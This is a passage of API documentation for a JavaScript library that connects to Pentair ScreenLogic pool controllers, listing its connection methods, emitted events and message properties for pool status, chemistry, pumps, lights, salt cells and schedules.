var client = new ScreenLogic.UnitConnection(80, '10.0.0.85', '1234')
```
#### connect()
Connects to the server passed to its constructor.
Examples:
```javascript
var client = new ScreenLogic.UnitConnection(server);
client.connect();
```
#### close()
Closes the connection.
#### addClient(clientId, senderId)
Registers to receive updates from controller when something changes. Takes a random number `clientId` to identify the client. Emits the `poolStatus` event when something changes on the controller, and the `addClient` event when the request to add a client is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### addNewScheduleEvent(scheduleType, senderId)
Adds a new event to the specified schedule type. See [`SLAddNewScheduleEvent`](#sladdnewscheduleevent) documentation for argument values. Emits either the `addNewScheduleEvent` or `scheduleChanged` event when response is acknowledged (listen for both). `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### cancelDelay(senderId)
Cancels any delays on the system. See [`SLCancelDelay`](#slcanceldelay) documentation. Emits the `cancelDelay` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### deleteScheduleEventById(scheduleId, senderId)
Deletes a scheduled event with specified id. See [`SLDeleteScheduleEventById`](#sldeletescheduleeventbyid) documentation for argument values. Emits the `deleteScheduleById` or `scheduleChanged` event when response is acknowledged (listen for both). `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getChemHistoryData(fromTime, toTime, senderId)
Requests chemical history data from the connected unit. This is information about the pH and ORP readings over time and when pH and ORP feeds were turned on and off. `fromTime` is the time (as a Javascript Date object) that you want to get events from and `toTime` is the time (as a Javascript Date object) that you want to get events until. Emits the `getChemHistoryDataPending` event when the request to get data is confirmed, then the `getChemHistoryData` event when the chemical history data is actually ready to be handled. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getChemicalData(senderId)
Requests chemical data from the connected unit (may require an IntelliChem or similar). Emits the `chemicalData` event when the response comes back. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getControllerConfig(senderId)
Requests controller configuration from the connected unit. Emits the `controllerConfig` event when the response comes back. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getHistoryData(fromTime, toTime, senderId)
Requests history data from the connected unit. This is information like what various temperature sensors (air, water) read over time, changes in heat setpoints, and when various circuits (pool, spa, solar, heater, and lights) were turned on and off. `fromTime` is the time (as a Javascript Date object) that you want to get events from and `toTime` is the time (as a Javascript Date object) that you want to get events until. Emits the `getHistoryDataPending` event when the request to get data is confirmed, then the `getHistoryData` event when the history data is actually ready to be handled. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getPoolStatus(senderId)
Requests pool status from the connected unit. Emits the `poolStatus` event when the response comes back. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getPumpStatus(pumpId, senderId)
Gets information about the specified pump. See [`SLGetPumpStatus`](#slgetpumpstatus) documentation for argument values. Emits the `getPumpStatus` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getSaltCellConfig(senderId)
Requests salt cell status/configuration from the connected unit (requires an IntelliChlor or compatible salt cell). Emits the `saltCellConfig` event when the response comes back. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getScheduleData(scheduleType, senderId)
Retrieves a list of schedule events of the specified type. See [`SLGetScheduleData`](#slgetscheduledata) documentation for argument values. Emits the `getScheduleData` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getSystemTime(senderId)
Retrieves the current time the system is set to. Emits the `getSystemTime` event when response is received. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### getVersion(senderId)
Requests the system version string from the connected unit. Emits the `version` event when the response comes back. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### pingServer(senderId)
Sends a ping to the server to keep the connection alive. Emits the `pong` event when the response comes back. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### removeClient(clientId, senderId)
No longer receive `poolStatus` messages from controller. Emits the `removeClient` event when the request to remove a client is acknowledged. Takes a random number `clientId` that should match a previously registered client with `addClient`. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### sendLightCommand(controllerId, command, senderId)
Sends a lighting command. See [`SLLightControlMessage`](#sllightcontrolmessage) documentation for argument values. Emits the `sentLightCommand` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
Note that better/more complete handling of lighting is desired, but I have yet to find all the commands I need to implement to make that happen. This currently sends each command to all lights and there is no ability to send to an individual light. Pull requests adding more functionality here would be most welcome.
#### setCircuitRuntimebyId(circuitId, runTime, senderId)
Configures default run-time of a circuit, usually referred to as the 'egg timer'. This also applies to 'run-once' programs as this will set the length of the program. See [`SLSetCircuitRuntimeById`](#slsetcircuitruntimebyid) documentation for argument values. Emits the `setCircuitRuntimeById` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### setCircuitState(controllerId, circuitId, circuitState, senderId)
Activates or deactivates a circuit. See [`SLSetCircuitStateMessage`](#slsetcircuitstatemessage) documentation for argument values. Emits the `circuitStateChanged` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### setHeatMode(controllerId, bodyType, heatMode, senderId)
Sets the preferred heat mode. See [`SLSetHeatModeMessage`](#slsetheatmodemessage) documentation for argument values. Emits the `heatModeChanged` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### setSaltCellOutput(controllerId, poolOutput, spaOutput, senderId)
Sets the salt cell's output levels. See [`SLSetSaltCellConfigMessage`](#slsetsaltcellconfigmessage) documentation for argument values. Emits the `setSaltCellConfig` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### setScheduleEventById(scheduleId, circuitId, startTime, stopTime, dayMask, flags, heatCmd, heatSetPoint, senderId)
Configures a schedule event. See [`SLSetScheduleEventById`](#slsetscheduleeventbyid) documentation for argument values. Emits the `setScheduleEventById` or `scheduleChanged` event when response is acknowledged (listen for both). `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### setSetPoint(controllerId, bodyType, temperature, senderId)
Sets the heating setpoint for any body. See [`SLSetHeatSetPointMessage`](#slsetheatsetpointmessage) documentation for argument values. Emits the `setPointChanged` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### setPumpFlow(pumpId, circuitId, setPoint, isRPMs, senderId)
Sets flow setting for a pump/circuit combination. See [`SLSetPumpFlow`](#slsetpumpflow) documentation for argument values. Emits the `setPumpFlow` event when response is acknowledged. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
#### setSystemTime(date, adjustForDST, senderId)
Sets the current date and time of the ScreenLogic system. Emits the `setSystemTime` event when request is acknowledged. `date` must be a `Date` instance holding the date/time to set, and `adjustForDST` must be a boolean indicating whether the system should adjust for daylight saving time or not. `senderId` is an optional 16-bit integer and will be present as the `senderId` field on the returned message.
### Events
* `addClient` - Indicates that a response to `addClient()` has been received. Event handler receives a [`SLAddClient`](#sladdclient) object.
* `addNewScheduleEvent` - Indicates that a response to `addNewScheduleEvent()` has been received which contains the created `scheduleId` to be used later for setting up the properties. Event handler receives a [`SLAddNewScheduleEvent`](#sladdnewscheduleevent) object.
* `badParameter` - Indicates that a bad parameter has been supplied to a function. This can be triggered, for example, by sending the wrong controller ID to a `set` function.
* `cancelDelay` - Indicates that a response to `cancelDelay()` has been received. Event handler receives a [`SLCancelDelay`](#slcanceldelay) object.
* `chemicalData` - Indicates that a response to `getChemicalData()` has been received. Event handler receives a [`SLChemDataMessage`](#slchemdatamessage) object.
* `circuitStateChanged` - Indicates that a response to `setCircuitState()` has been received. Event handler receives a [`SLSetCircuitStateMessage`](#slsetcircuitstatemessage) object.
* `close` - Indicates that the connection to the unit has been closed. Event handler receives a bool indicating whether there was a transmission error.
* `controllerConfig` - Indicates that a response to `getControllerConfig()` has been received. Event handler receives a [`SLControllerConfigMessage`](#slcontrollerconfigmessage) object.
* `deleteScheduleById` - Indicates that a response to `deleteScheduleById()` has been received. Event handler receives a [`SLDeleteScheduleEventById`](#sldeletescheduleeventbyid) object.
* `error` - Indicates that an unhandled error was caught (such as the connection timing out)
* `getChemHistoryData` - Indicates that chemical history data for the requested timeframe is ready. Event handler receives a [`SLGetChemHistoryData`](#slgetchemhistorydata) object.
* `getChemHistoryDataPending` - Indicates that the `getChemHistoryData()` request has been received and is being processed.
* `getHistoryData` - Indicates that history data for the requested timeframe is ready. Event handler receives a [`SLGetHistoryData`](#slgethistorydata) object.
* `getHistoryDataPending` - Indicates that the `getHistoryData()` request has been received and is being processed.
* `getPumpStatus` - Indicates that a response to `getPumpStatus()` has been received. Event handler receives a [`SLGetPumpStatus`](#slgetpumpstatus) object.
* `getScheduleData` - Indicates that a response to `getScheduleData()` has been received. Event handler receives a [`SLGetScheduleData`](#slgetscheduledata) object.
* `getSystemTime` - Indicates that a response to `getSystemTime()` has been received. Event handler receives a [`SLGetSystemTime`](#slgetsystemtime) object.
* `heatModeChanged` - Indicates that a response to `setHeatMode()` has been received. Event handler receives a [`SLSetHeatModeMessage`](#slsetheatmodemessage) object.
* `loggedIn` - Indicates that a connection to the server has been established and the login process completed. `get` methods can be called once this event has been emitted.
* `loginFailed` - Indicates that a remote login attempt via supplying a system address and password to `UnitConnection` has failed likely due to the incorrect password being used.
* `pong` - Indicates that a response to `pingServer()` has been received. Event handler receives a [`SLPingServerMessage`](#slpingservermessage) object.
* `poolStatus` - Indicates that a response to `getPoolStatus()` has been received. Event handler receives a [`SLPoolStatusMessage`](#slpoolstatusmessage) object.
* `removeClient` - Indicates that a response to `removeClient()` has been received. Event handler receives a [`SLRemoveClient`](#slremoveclient) object.
* `saltCellConfig` - Indicates that a response to `getSaltCellConfig()` has been received. Event handler receives a [`SLSaltCellConfigMessage`](#slsaltcellconfigmessage) object.
* `scheduleChanged` - Indicates that a response to adding, deleting, or setting a schedule has been received. Event handler receives nothing. This seems to be arbitrarily returned sometimes instead of a normal ack by the system.
* `sentLightCommand` - Indicates that a response to `sendLightCommand()` has been received. Event handler receives a [`SLLightControlMessage`](#sllightcontrolmessage) object.
* `setCircuitRuntimeById` - Indicates that a response to `setCircuitRuntimeById()` has been received. Event handler receives a [`SLSetCircuitRuntimeById`](#slsetcircuitruntimebyid) object.
* `setPumpFlow` - Indicates that a response to `setPumpFlow()` has been received. Event handler receives a [`SLSetPumpFlow`](#slsetpumpflow) object.
* `setPointChanged` - Indicates that a response to `setSetPoint()` has been received. Event handler receives a [`SLSetHeatSetPointMessage`](#slsetheatsetpointmessage) object.
* `setSaltCellConfig` - Indicates that a response to `setSaltCellOutput()` has been received. Event handler receives a [`SLSetSaltCellConfigMessage`](#slsetsaltcellconfigmessage) object.
* `setScheduleEventById` - Indicates that a response to `setScheduleEventById()` has been received. Event handler receives a [`SLSetScheduleEventById`](#slsetscheduleeventbyid) object.
* `setSystemTime` - Indicates that a response to `setSystemTime()` has been received. Event handler receives a [`SLSetSystemTime`](#slsetsystemtime) object if the request was valid, or `null` if the request was invalid (input parameters were not of the required types).
* `unknownCommand` - Indicates that an unknown command was issued to ScreenLogic (should not be possible to trigger when using the supplied `UnitConnection` methods).
* `version` - Indicates that a response to `getVersion()` has been received. Event handler receives a [`SLVersionMessage`](#slversionmessage) object.
#### Properties
* `address` - string representing the IPv4 address of the found server
* `type` - integer representing the type of server found (will always be 2)
* `port` - short representing the port to use for TCP connections to this server
* `gatewayType` - byte
* `gatewaySubtype` - byte
* `gatewayName` - string representing the server's name. Will be in the format Pentair: xx-xx-xx
### All messages
Information about features common to all the below SL Message types.
#### decodeTime(time)
Interprets a time integer recorded as minutes past midnight and returns the ScreenLogic string representation of it in 24-hour time.
#### encodeTime(time)
Interprets the string representing 24-hour time and returns an integer of minutes past midnight.
#### decodeDayMask(mask)
Converts a day mask from, for example, `SLGetScheduleData`'s events[idx].days property into a `DAY_VALUES` array for ease of use.
#### encodeDayMask(days)
Converts an array of DAY_VALUES into a mask used by, for example, `SLGetScheduleData`'s events[idx].days property.
#### getDayValue(dayName)
Returns the value of a given `DAY_VALUES` day name.
`DAY_VALUES` is defined as the following array for simplicity of checking whether a specific day is set in a mask:
```js
const DAY_VALUES = [
['Mon', 0x1 ],
['Tue', 0x2 ],
['Wed', 0x4 ],
['Thu', 0x8 ],
['Fri', 0x10 ],
['Sat', 0x20 ],
['Sun', 0x40 ],
];
```
#### Properties
* `senderId` - an integer matching whatever was passed as the `senderId` argument when making the initial request (default 0)
* `messageId` - an integer indicating the ScreenLogic ID for this message
### SLAddClient
Passed as an argument to the emitted `addClient` event.
### SLAddNewScheduleEvent
Passed as an argument to the emitted `addNewScheduleEvent` event. Adds a new event to the specified schedule type, either 0 for regular events or 1 for one-time events.
#### Properties
* `scheduleType` - 0 indicates regular scheduled events, 1 indicates a run-once event
### SLCancelDelay
Passed as an argument to the emitted `cancelDelay` event.
### SLChemDataMessage
Passed as an argument to the emitted `chemicalData` event handler.
#### Properties
* `isValid` - boolean indicating whether we got a valid response back or not
* `pH` - float indicating the current pH level
* `orp` - short indicating the current ORP level
* `pHSetPoint` - float indicating the desired pH level
* `orpSetPoint` - short indicating the desired ORP level
* `pHTankLevel` - byte indicating how full the pH tank is. I believe this operates on a 0-6 scale
* `orpTankLevel` - byte indicating how full the ORP tank is
* `saturation` - float indicating water balance/LSI saturation
* `calcium` - short indicating the calcium level (manually set)
* `cyanuricAcid` - short indicating the CYA level (manually set)
* `alkalinity` - short indicating the alkalinity level (manually set)
* `saltPPM` - integer representing the salt level in parts-per-million
* `temperature` - byte indicating the current water temperature
* `corrosive` - boolean indicating whether the water balance is corrosive or not
* `scaling` - boolean indicating whether the water balance is scaling or not
* `error` - boolean indicating whether there's currently an error in the chem system or not
### SLControllerConfigMessage
Passed as an argument to the emitted `controllerConfig` event handler.
#### hasSolar()
Returns a bool indicating whether the system has solar present. (Helper method for interpreting the value in `equipFlags`.)
#### hasSolarAsHeatpump()
Returns a bool indicating whether the system has a solar heatpump (UltraTemp, ThermalFlo) present. (Helper method for interpreting the value in `equipFlags`.)
#### hasChlorinator()
Returns a bool indicating whether the system has a chlorinator present. (Helper method for interpreting the value in `equipFlags`.)
#### hasCooling()
Returns a bool indicating whether the system has a cooler present. (Helper method for interpreting the value in `equipFlags`.)
#### hasIntellichem()
Returns a bool indicating whether the system has an IntelliChem chemical management system present. (Helper method for interpreting the value in `equipFlags`.)
#### isEasyTouch()
Returns a bool indicating whether the system is an EasyTouch system or not. (Helper method for interpreting the value in `controllerType`.)
#### isIntelliTouch()
Returns a bool indicating whether the system is an IntelliTouch system or not. (Helper method for interpreting the value in `controllerType`.)
#### isEasyTouchLite()
Returns a bool indicating whether the system is an EasyTouch Lite system or not. (Helper method for interpreting the value in `controllerType` and `hwType`.)
#### isDualBody()
Returns a bool indicating whether the system is dual-body or not. (Helper method for interpreting the value in `controllerType`.)
#### isChem2()
Returns a bool indicating whether the system is a Chem2 system or not. (Helper method for interpreting the value in `controllerType` and `hwType`.)
#### getCircuitByDeviceId(deviceId)
Returns the `bodyArray` entry for the circuit matching the given device id. This is most useful with an [`SLGetPumpStatus`](#slgetpumpstatus) message.
#### Properties
* `controllerId` - integer indicating the controller's ID
* `minSetPoint` - array (size 2) indicating the minimum setpoint available for the pool (index 0) or spa (index 1)
* `maxSetPoint` - array (size 2) indicating the maximum setpoint available for the pool (index 0) or spa (index 1)
* `degC` - boolean indicating whether the system is using the centigrade scale for temperatures or not
* `controllerType` - byte
* `hwType` - byte
* `controllerData` - byte
* `equipFlags` - integer indicating the type(s) of equipment present in the system (see helper methods above for interpreting these values)
* `genCircuitName` - string indicating the circuit name
* `bodyArray` - array (size number-of-circuits) holding circuit data
* `circuitId` - integer indicating circuit ID (e.g.: 500 is spa, 505 is pool)
* `name` - string representing the name of the circuit
* `nameIndex` - byte
* `function` - byte
* `interface` - byte
* `flags` - byte
* `colorSet` - byte
* `colorPos` - byte
* `colorStagger` - byte
* `deviceId` - byte
* `dfaultRt` - short
* `colorArray` - array (size number-of-colors) holding data about available light colors
* `name` - color name
* `color` - object containing `r`/`g`/`b` properties as bytes (values from 0-255) indicating the color
* `pumpCircArray` - array (size 8) holding data about pumps attached to the system
* `interfaceTabFlags` - integer
* `showAlarms` - integer
### SLDeleteScheduleEventById
Passed as an argument to the emitted `deleteScheduleEventById` event. Deletes a scheduled event with specified id.
#### Properties
* `scheduleId` - the scheduleId of the schedule to be deleted
### SLGetChemHistoryData
Passed as an argument to the emitted `getChemHistoryData` event. Contains information about the remote unit's pH and ORP readings over time as well as pH and ORP feed on/off times.
#### Properties
* `phPoints` - array of objects containing the pH reading over time. Each object contains a `time` key containing a Javascript Date object, and a `pH` key containing the pH reading as a float.
* `orpPoints` - array of objects containing the ORP reading over time. Each object contains a `time` key containing a Javascript Date object, and an `orp` key containing the ORP reading as an integer.
* `phRuns` - array of objects containing the pH feed on/off times. Each object contains an `on` key containing a Javascript Date object for when the feed turned on, and an `off` key containing a Javascript Date object for when the feed turned off.
* `orpRuns` - array of objects containing the ORP feed on/off times. Each object contains an `on` key containing a Javascript Date object for when the feed turned on, and an `off` key containing a Javascript Date object for when the feed turned off.
### SLGetGatewayDataMessage
Passed as an argument to the emitted `gatewayFound` event. Contains information about the remote unit's status and access properties.
#### Properties
* `gatewayFound` - boolean indicating whether a unit was found
* `licenseOK` - boolean indicating if the license is valid (I've never seen this be false)
* `ipAddr` - string containing the ipv4 address to remotely connect to this unit
* `port` - number containing the port to connect to the unit
* `portOpen` - boolean indicating whether or not the port is open and able to be connected to
* `relayOn` - boolean indicating whether the relay is on (unsure what exactly this indicates; it's always been false in my tests)
### SLGetHistoryData
Passed as an argument to the emitted `getHistoryData` event. Contains information about the remote unit's temperature and circuit on/off times over time.
#### Properties
* `airTemps` - array of objects containing the air temperature over time. Each object contains a `time` key containing a Javascript Date object, and a `temp` key containing the temperature as an integer.
* `poolTemps` - array of objects containing the pool temperature over time. Each object contains a `time` key containing a Javascript Date object, and a `temp` key containing the temperature as an integer.
* `poolSetPointTemps` - array of objects containing the pool setpoint over time. Each object contains a `time` key containing a Javascript Date object, and a `temp` key containing the temperature as an integer.
* `spaTemps` - array of objects containing the spa temperature over time. Each object contains a `time` key containing a Javascript Date object, and a `temp` key containing the temperature as an integer.
* `spaSetPointTemps` - array of objects containing the spa setpoint over time. Each object contains a `time` key containing a Javascript Date object, and a `temp` key containing the temperature as an integer.
* `poolRuns` - array of objects containing the pool on/off times over time. Each object contains an `on` key containing a Javascript Date object for when the circuit turned on, and an `off` key containing a Javascript Date object for when the circuit turned off.
* `spaRuns` - array of objects containing the spa on/off times over time. Each object contains an `on` key containing a Javascript Date object for when the circuit turned on, and an `off` key containing a Javascript Date object for when the circuit turned off.
* `solarRuns` - array of objects containing the solar on/off times over time. Each object contains an `on` key containing a Javascript Date object for when the circuit turned on, and an `off` key containing a Javascript Date object for when the circuit turned off.
* `heaterRuns` - array of objects containing the heater on/off times over time. Each object contains an `on` key containing a Javascript Date object for when the circuit turned on, and an `off` key containing a Javascript Date object for when the circuit turned off.
* `lightRuns` - array of objects containing the light on/off times over time. Each object contains an `on` key containing a Javascript Date object for when the circuit turned on, and an `off` key containing a Javascript Date object for when the circuit turned off.
### SLGetPumpStatus
Passed as an argument to the emitted `getPumpStatus` event. Gets information about the specified pump.
#### Properties
* `pumpId` - id of pump to get information about, first pump is 0
#### Return Values
* `isRunning` - boolean that says if pump is running
* `pumpType` - 0 if invalid pump id or one of the IntelliFlo constants:
* ScreenLogic.PUMP_TYPE_INTELLIFLOVF
* ScreenLogic.PUMP_TYPE_INTELLIFLOVS
* ScreenLogic.PUMP_TYPE_INTELLIFLOVSF
* `pumpWatts` - current Watts usage of the pump
* `pumpRPMs` - current RPMs of the pump
* `pumpGPMs` - current GPMs of the pump
* `pumpSetting` - Array of 8 items each containing
* `circuitId` - Circuit Id (CircuitId matched data returned by [`SLControllerConfigMessage`](#slcontrollerconfigmessage)'s `getCircuitByDeviceId()`)
* `pumpSetPoint` - the set point for this pump/circuit combo (in either RPMs or GPMs depending on the value of `isRPMs`)
* `isRPMs` - boolean indicating if the set point is in RPMs (false means it's in GPMs)
* `pumpUnknown1` - unknown data; always 0
* `pumpUnknown2` - unknown data; always 255
### SLGetScheduleData
Passed as an argument to the emitted `getScheduleData` event. Retrieves a list of schedule events of the specified type, either 0 for regular events or 1 for one-time events.
#### Properties
* `eventCount` - the number of `events` returned
* `events` - array containing:
* `scheduleId` - the associated scheduleId
* `circuitId` - the circuit this schedule affects
* `startTime` - the start time of the event, specified as a string in 24-hour time, so, for example, 6:00AM would be '0600' (see [conversion functions](#decodetimetime))
* `stopTime` - the stop time of the event, specified as a string in 24-hour time, so, for example, 6:00AM would be '0600' (see [conversion functions](#decodetimetime))
* `dayMask` - 7-bit mask that determines which days the schedule is active for, MSB is always 0, valid numbers 1-127 (see [conversion functions](#decodedaymaskmask))
* `flags`
* bit 0 is the schedule type, if 0 then regular event, if 1 its a run-once
* bit 1 indicates whether heat setPoint should be changed
* `heatCmd` - integer indicating the desired heater mode. Valid values are:
* ScreenLogic.HEAT_MODE_OFF
* ScreenLogic.HEAT_MODE_SOLAR
* ScreenLogic.HEAT_MODE_SOLARPREFERRED
* ScreenLogic.HEAT_MODE_HEATPUMP
* ScreenLogic.HEAT_MODE_DONTCHANGE
* `heatSetPoint` - the temperature set point if heat is to be changed (ignored if bit 1 of flags is 0)
* `days` - which days this schedule is active for; this is just the `dayMask` property run through [`decodeDayMask()`](#decodedaymaskmask) for convenience
### SLGetSystemTime
Contains information about the system's current time and date. Passed as an argument to the emitted `getSystemTime` event.
#### Properties
* `date` - `Date` instance representing the current system datetime (preferred, the other properties are derived from this one and provided for backward compatibility purposes)
* `year` - short representing current system year
* `month` - short representing current system month (where 1 is January, 2 is February, etc.)
* `day` - short representing current system day of the month
* `dayOfWeek` - short representing current system day of the week (where 1 is Sunday and 7 is Saturday)
* `hour` - short representing current system hour (24-hour time where 0 is midnight, 13 is 1PM, etc.)
* `minute` - short representing current system minute
* `second` - short representing current system second
* `millisecond` - short representing current system millisecond
* `adjustForDST` - bool indicating whether the system should adjust for daylight saving time or not
### SLLightControlMessage
Passed as an argument to the emitted `sentLightCommand` event.
#### Properties
* `controllerId` - integer indicating the ID of the controller to send this command to.
* Note that while `SLControllerConfigMessage` includes a controllerId, this ID, in my experience, should always be 0.
* `command` - integer indicating which command to send to the lights. Valid values are:
* ScreenLogic.LIGHT_CMD_LIGHTS_OFF
* ScreenLogic.LIGHT_CMD_LIGHTS_ON
* ScreenLogic.LIGHT_CMD_COLOR_SET
* ScreenLogic.LIGHT_CMD_COLOR_SYNC
* ScreenLogic.LIGHT_CMD_COLOR_SWIM
* ScreenLogic.LIGHT_CMD_COLOR_MODE_PARTY
* ScreenLogic.LIGHT_CMD_COLOR_MODE_ROMANCE
* ScreenLogic.LIGHT_CMD_COLOR_MODE_CARIBBEAN
* ScreenLogic.LIGHT_CMD_COLOR_MODE_AMERICAN
* ScreenLogic.LIGHT_CMD_COLOR_MODE_SUNSET
* ScreenLogic.LIGHT_CMD_COLOR_MODE_ROYAL
* ScreenLogic.LIGHT_CMD_COLOR_SET_SAVE
* ScreenLogic.LIGHT_CMD_COLOR_SET_RECALL
* ScreenLogic.LIGHT_CMD_COLOR_BLUE
* ScreenLogic.LIGHT_CMD_COLOR_GREEN
* ScreenLogic.LIGHT_CMD_COLOR_RED
* ScreenLogic.LIGHT_CMD_COLOR_WHITE
* ScreenLogic.LIGHT_CMD_COLOR_PURPLE
### SLPingServerMessage
Passed as an argument to the emitted `pong` event handler.
### SLPoolStatusMessage
Passed as an argument to the emitted `poolStatus` event handler.
#### isDeviceReady()
Returns a bool indicating whether the device is in a normal operating state.
#### isDeviceSync()
Returns a bool.
#### isDeviceServiceMode()
Returns a bool indicating whether the device is in service mode or not.
#### isSpaActive()
Returns a bool indicating whether the spa is currently active or not.
#### isPoolActive()
Returns a bool indicating whether the pool is currently active or not.
#### Properties
* `ok` - can be interpreted with `isDevice...` methods.
* `freezeMode` - byte representing whether the device is in freeze mode or not.
* `remotes` - byte
* `poolDelay` - byte
* `spaDelay` - byte
* `cleanerDelay` - byte
* `airTemp` - integer representing the current temperature (check controller config to see if it's in celsius or fahrenheit)
* `currentTemp` - array of size 0-2 indicating current temperature of each body as an integer (pool: 0, spa: 1) (check controller config to see if it's in celsius or fahrenheit)
* `heatStatus` - array of size 0-2 indicating whether heat is active or not for each body as an integer (pool: 0, spa: 1)
* `setPoint` - array of size 0-2 holding the heating set point for each body as an integer (pool: 0, spa: 1) (check controller config to see if it's in celsius or fahrenheit)
* `coolSetPoint` - array of size 0-2 holding the cooling set point for each body as an integer (pool: 0, spa: 1; the spa seems to always track air temperature for this, however) (check controller config to see if it's in celsius or fahrenheit)
* `heatMode` - array of size 0-2 indicating whether heating is enabled or not for each body as an integer (pool: 0, spa: 1)
* `circuitArray` - array holding all circuits in the system
* `id` - integer representing the circuit's ID (spa is 500, pool is 505)
* `state` - integer indicating whether the circuit is on or not (0/1)
* `colorSet` - byte
* `colorPos` - byte
* `colorStagger` - byte
* `delay` - byte
* `pH` - float indicating the current pH level (e.g.: 7.62)
* `orp` - integer indicating the current ORP value if available (e.g.: 650)
* `saturation` - float indicating the water balance/saturation level (e.g.: -0.13)
* `saltPPM` - integer indicating the salt level in parts-per-million (e.g.: 3000)
* `pHTank` - integer indicating the fill level of the pH tank (e.g.: 4)
* `orpTank` - integer indicating the fill level of the ORP tank
* `alarms` - integer indicating how many alarms are currently active
### SLRemoveClient
Passed as an argument to the emitted `removeClient` event.
### SLSaltCellConfigMessage
Passed as an argument to the emitted `saltCellConfig` event handler.
#### Properties
* `installed` - boolean indicating whether a salt cell is installed or not
* `status` - integer bitmask
* `level1` - integer indicating the output level of the salt cell for the pool. I believe this operates on a 0-100 scale
* `level2` - integer indicating the output level of the salt cell for the spa. I believe this operates on a 0-100 scale
* `salt` - integer indicating salt level in parts-per-million
* `flags` - integer bitmask
* `superChlorTimer` - integer
### SLSetCircuitRuntimeById
Passed as an argument to the emitted `setCircuitRuntimebyId` event. Configures default run-time of a circuit, usually referred to as the 'egg timer'. This also applies to 'run-once' programs as this will set the length of the program.
#### Properties
* `circuitId` - id of the circuit to which this event applies to
* `runTime` - integer specifying the run time in minutes
### SLSetCircuitStateMessage
Passed as an argument to the emitted `circuitStateChanged` event.
#### Properties
* `controllerId` - integer indicating the ID of the controller to send this command to.
* Note that while `SLControllerConfigMessage` includes a controllerId, this ID, in my experience, should always be 0.
* `circuitId` - integer indicating the ID of the circuit to set the state of.
* This ID can be retrieved from `SLControllerConfigMessage`'s `bodyArray` property.
* `circuitState` - integer indicating whether to switch the circuit on (`1`) or off (`0`).
### SLSetHeatModeMessage
Passed as an argument to the emitted `heatModeChanged` event.
#### Properties
* `controllerId` - integer indicating the ID of the controller to send this command to.
* Note that while `SLControllerConfigMessage` includes a controllerId, this ID, in my experience, should always be 0.
* `bodyType` - integer indicating the type of body to set the setpoint of. The pool is body `0` and the spa is body `1`.
* `heatMode` - integer indicating the desired heater mode. Valid values are:
* ScreenLogic.HEAT_MODE_OFF
* ScreenLogic.HEAT_MODE_SOLAR
* ScreenLogic.HEAT_MODE_SOLARPREFERRED
* ScreenLogic.HEAT_MODE_HEATPUMP
* ScreenLogic.HEAT_MODE_DONTCHANGE
### SLSetHeatSetPointMessage
Passed as an argument to the emitted `setPointChanged` event.
#### Properties
* `controllerId` - integer indicating the ID of the controller to send this command to.
* Note that while `SLControllerConfigMessage` includes a controllerId, this ID, in my experience, should always be 0.
* `bodyType` - integer indicating the type of body to set the setpoint of. The pool is body `0` and the spa is body `1`.
* `temperature` - integer indicating the desired setpoint. This is presumably in whatever units your system is set to (celsius or fahrenheit).
### SLSetPumpFlow
Passed as an argument to the emitted `setPumpFlow` event. Sets flow setting for a pump/circuit combination.
#### Properties
* `pumpId` - id of pump to get information about, first pump is 0
* `circuitId` - index of circuit for which to change the set point (index is relative to data returned by [`SLGetPumpStatus`](#slgetpumpstatus))
* `setPoint` - the value for which to set the pump/circuit combo
* `isRPMs` - boolean, `true` for RPMs, `false` for GPMs
### SLSetSaltCellConfigMessage
Passed as an argument to the emitted `setSaltCellConfig` event.
#### Properties
* `controllerId` - integer indicating the ID of the controller to send this command to.
* Note that while `SLControllerConfigMessage` includes a controllerId, this ID, in my experience, should always be 0.
* `poolOutput` - integer indicating the output level of the salt cell for the pool. I believe this operates on a 0-100 scale.
* `spaOutput` - integer indicating the output level of the salt cell for the spa. I believe this operates on a 0-100 scale.
### SLSetScheduleEventById
Passed as an argument to the emitted `setScheduleEventById` event. Configures an event with properties as described below.
#### Properties
* `scheduleId` - id of a schedule previously created, see [`SLAddNewScheduleEvent`](#sladdnewscheduleevent)
* `circuitId` - id of the circuit to which this event applies
* `startTime` - the start time of the event, specified as minutes since midnight (see [conversion functions](#encodetimetime))
* example: 6:00am would be 360
* example: 6:15am would be 375
* `stopTime` - the stop time of the event, specified as minutes since midnight (see [conversion functions](#encodetimetime))
* `dayMask`
* 7-bit mask that determines which days the schedule is active for, MSB is always 0, valid numbers 1-127
* `flags`
* bit 0 is the schedule type, if 0 then regular event, if 1 its a run-once
* bit 1 indicates whether heat setPoint should be changed
* `heatCmd` - integer indicating the desired heater mode. Valid values are:
* ScreenLogic.HEAT_MODE_OFF
* ScreenLogic.HEAT_MODE_SOLAR
* ScreenLogic.HEAT_MODE_SOLARPREFERRED
* ScreenLogic.HEAT_MODE_HEATPUMP
* ScreenLogic.HEAT_MODE_DONTCHANGE
